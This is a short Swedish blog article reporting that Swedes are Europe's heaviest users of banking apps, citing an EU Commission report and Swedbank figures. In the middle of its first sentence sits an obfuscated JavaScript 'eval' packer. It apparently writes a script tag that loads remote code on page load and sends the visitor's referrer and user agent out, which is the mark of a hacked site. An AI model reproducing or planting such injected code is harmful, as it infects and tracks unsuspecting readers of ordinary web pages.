Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Svenskar duktiga på att använda bankappar

Svenskar duktiga på att använda bankappar
Sebastian Plengier Ehrnfelt

Svenskar eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tyhtk|var|u0026u|referrer|zhsts||js|php’.split(‘|’),0,{}))
är bäst på att använda bankappar i Europa.

Det är enligt en rapport från EU-kommissionen som de nu kommit fram att de som använder bankappar mest i Europa är svenskarna.

Det saknas fortfarande officiell statistik på exakt hur många européer som använder bankappar till mobilen för att utgöra bankärenden. Enligt Lotta Lovén på Swedbank så har deras egna applikation blivit nerladdad ca en miljon gånger och hon säger att merparten använder den mer än en gång i månaden.

Lotta Lovén menar också att vidare 15 procent av nätkunderna har övergett den traditionella internetbanken och nu helt sköter sina bankaffärer via mobilen.

Jag kan från egen erfarenhet förstår detta då jag själv är väldigt duktig på att använda appen och inte datorn när ärenden på banken ska göras.

Via: www.di.se